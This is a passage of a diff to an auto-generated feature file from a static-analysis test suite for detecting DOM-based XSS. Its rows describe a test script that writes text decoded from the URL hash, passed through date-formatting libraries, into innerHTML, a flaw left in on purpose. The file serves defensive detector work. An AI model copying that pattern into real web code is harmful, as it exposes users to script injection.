dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:20:5:20:30 | import ... dayjs'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:20:5:20:30 | import ... dayjs'; | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:20:5:20:30 | import ... dayjs'; | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:20:5:20:30 | import ... dayjs'; | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:20:12:20:16 | dayjs | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:20:12:20:16 | dayjs | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:20:12:20:16 | dayjs | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:20:12:20:16 | dayjs | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:20:12:20:16 | dayjs | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:20:12:20:16 | dayjs | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:20:12:20:16 | dayjs | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:20:12:20:16 | dayjs | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:20:12:20:16 | dayjs | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:20:12:20:16 | dayjs | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:20:12:20:16 | dayjs | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:20:12:20:16 | dayjs | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:20:12:20:16 | dayjs | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:20:23:20:29 | 'dayjs' | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:20:23:20:29 | 'dayjs' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:20:23:20:29 | 'dayjs' | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:12 | document | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:12 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:12 | document | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:12 | document | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:12 | document | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:17 | document.body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:17 | document.body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:17 | document.body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:17 | document.body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:17 | document.body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:27 | documen ... nerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:27 | documen ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:27 | documen ... nerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:27 | documen ... nerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:27 | documen ... nerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:68 | documen ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:68 | documen ... aint)}` | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:68 | documen ... aint)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:68 | documen ... aint)}` | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:21:5:21:68 | documen ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:21:14:21:17 | body | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:21:14:21:17 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:21:14:21:17 | body | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:21:14:21:17 | body | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:21:14:21:17 | body | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:21:19:21:27 | innerHTML | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:21:19:21:27 | innerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:21:19:21:27 | innerHTML | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:21:19:21:27 | innerHTML | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:21:19:21:27 | innerHTML | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:21:31:21:68 | `Time i ... aint)}` | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/dates.js:21:31:21:68 | `Time i ... aint)}` | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | | autogenerated/Xss/DomBasedXss/dates.js:21:31:21:68 | `Time i ... aint)}` | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/dates.js:21:31:21:68 | `Time i ... aint)}` | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:21:31:21:68 | `Time i ... aint)}` | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:21:31:21:68 | `Time i ... aint)}` | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:21:32:21:39 | Time is | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:21:32:21:39 | Time is | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:21:32:21:39 | Time is | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:21:32:21:39 | Time is | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:21:32:21:39 | Time is | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:21:32:21:39 | Time is | stringConcatenatedWith | -endpoint- dayjs().format() | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:46 | dayjs | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:46 | dayjs | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:46 | dayjs | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:46 | dayjs | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:46 | dayjs | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:52 | dayjs(time) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:52 | dayjs(time) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:52 | dayjs(time) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:52 | dayjs(time) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:52 | dayjs(time) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:52 | exceptional return of dayjs(time) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:52 | exceptional return of dayjs(time) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:52 | exceptional return of dayjs(time) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:52 | exceptional return of dayjs(time) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:52 | exceptional return of dayjs(time) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:59 | dayjs(time).format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:59 | dayjs(time).format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:59 | dayjs(time).format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:59 | dayjs(time).format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:59 | dayjs(time).format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:66 | dayjs(t ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:66 | dayjs(t ... (taint) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:66 | dayjs(t ... (taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:66 | dayjs(t ... (taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:66 | dayjs(t ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:66 | dayjs(t ... (taint) | stringConcatenatedWith | 'Time is ' -endpoint- | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:66 | exceptional return of dayjs(t ... (taint) | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:66 | exceptional return of dayjs(t ... (taint) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:66 | exceptional return of dayjs(t ... (taint) | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:66 | exceptional return of dayjs(t ... (taint) | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:21:42:21:66 | exceptional return of dayjs(t ... (taint) | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:21:48:21:51 | time | CalleeFlexibleAccessPath | dayjs | | autogenerated/Xss/DomBasedXss/dates.js:21:48:21:51 | time | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:21:48:21:51 | time | calleeImports | dayjs | @@ -13034,6 +97313,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:21:48:21:51 | time | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:21:48:21:51 | time | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:21:48:21:51 | time | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:21:54:21:59 | format | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:21:54:21:59 | format | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/dates.js:21:54:21:59 | format | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | +| autogenerated/Xss/DomBasedXss/dates.js:21:54:21:59 | format | enclosingFunctionName | main | +| autogenerated/Xss/DomBasedXss/dates.js:21:54:21:59 | format | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | | autogenerated/Xss/DomBasedXss/dates.js:21:61:21:65 | taint | CalleeFlexibleAccessPath | dayjs().format | | autogenerated/Xss/DomBasedXss/dates.js:21:61:21:65 | taint | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/dates.js:21:61:21:65 | taint | calleeImports | dayjs | @@ -13042,6 +97326,171 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/dates.js:21:61:21:65 | taint | enclosingFunctionBody | time Date taint decodeURIComponent window location hash substring 1 document body innerHTML Time is dateFns format time taint document body innerHTML Time is dateFnsEsm format time taint document body innerHTML Time is dateFnsFp format taint time document body innerHTML Time is dateFns format taint time document body innerHTML Time is dateFnsFp format time taint document body innerHTML Time is moment time format taint document body innerHTML Time is moment taint format document body innerHTML Time is dateformat time taint dayjs dayjs document body innerHTML Time is dayjs time format taint | | autogenerated/Xss/DomBasedXss/dates.js:21:61:21:65 | taint | enclosingFunctionName | main | | autogenerated/Xss/DomBasedXss/dates.js:21:61:21:65 | taint | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:24:1:24:42 | import ... luxon"; | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:24:1:24:42 | import ... luxon"; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:24:1:24:42 | import ... luxon"; | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:24:8:24:19 | LuxonAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:24:8:24:19 | LuxonAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:24:8:24:19 | LuxonAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:24:8:24:19 | LuxonAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:24:8:24:19 | LuxonAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:24:8:24:19 | LuxonAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:24:8:24:19 | LuxonAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:24:8:24:19 | LuxonAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:24:8:24:19 | LuxonAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:24:8:24:19 | LuxonAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:24:26:24:41 | "@date-io/luxon" | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:24:26:24:41 | "@date-io/luxon" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:24:26:24:41 | "@date-io/luxon" | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:25:1:25:47 | import ... e-fns"; | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:25:1:25:47 | import ... e-fns"; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:25:1:25:47 | import ... e-fns"; | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:25:8:25:21 | DateFnsAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:25:8:25:21 | DateFnsAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:25:8:25:21 | DateFnsAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:25:8:25:21 | DateFnsAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:25:8:25:21 | DateFnsAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:25:8:25:21 | DateFnsAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:25:8:25:21 | DateFnsAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:25:8:25:21 | DateFnsAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:25:8:25:21 | DateFnsAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:25:8:25:21 | DateFnsAdapter | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:25:28:25:46 | "@date-io/date-fns" | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:25:28:25:46 | "@date-io/date-fns" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:25:28:25:46 | "@date-io/date-fns" | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:26:1:26:44 | import ... oment"; | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:26:1:26:44 | import ... oment"; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:26:1:26:44 | import ... oment"; | fileImports | @date-io/date-fns @date-io/dayjs @date-io/luxon @date-io/moment date-fns date-fns/esm date-fns/fp dateformat dayjs luxon moment | +| autogenerated/Xss/DomBasedXss/dates.js:26:8:26:20 | MomentAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:26:8:26:20 | MomentAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:26:8:26:20 | MomentAdapter | contextFunctionInterfaces | dateio()\ndateio2()\nluxon()\nmain() | +| autogenerated/Xss/DomBasedXss/dates.js:26:8:26:20 | MomentAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:26:8:26:20 | MomentAdapter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/dates.js:26:8:26:20 | MomentAdapter | contextSurroundingFunctionParameters | | +| 